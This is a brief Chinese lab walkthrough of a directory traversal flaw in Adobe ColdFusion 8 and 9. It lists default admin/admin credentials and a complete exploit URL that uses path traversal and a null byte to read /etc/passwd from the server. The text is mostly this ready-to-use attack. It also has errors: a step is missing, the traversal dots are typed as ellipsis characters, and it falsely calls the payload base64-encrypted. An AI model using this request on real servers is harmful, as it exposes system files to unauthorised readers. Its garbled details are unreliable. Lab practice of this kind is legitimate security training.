1、漏洞描述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
2、启动靶场
3、访问地址
http://x.x.x.x:8500
4、找到登录界面
http://x.x.x.x:8500/CFIDE/administrator/index.cfm
默认登录的用户名个密码都是admin
6、直接访问
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en
中间是base64加密错一个符号都不可以
访问就可以读取到/etc/passwd文件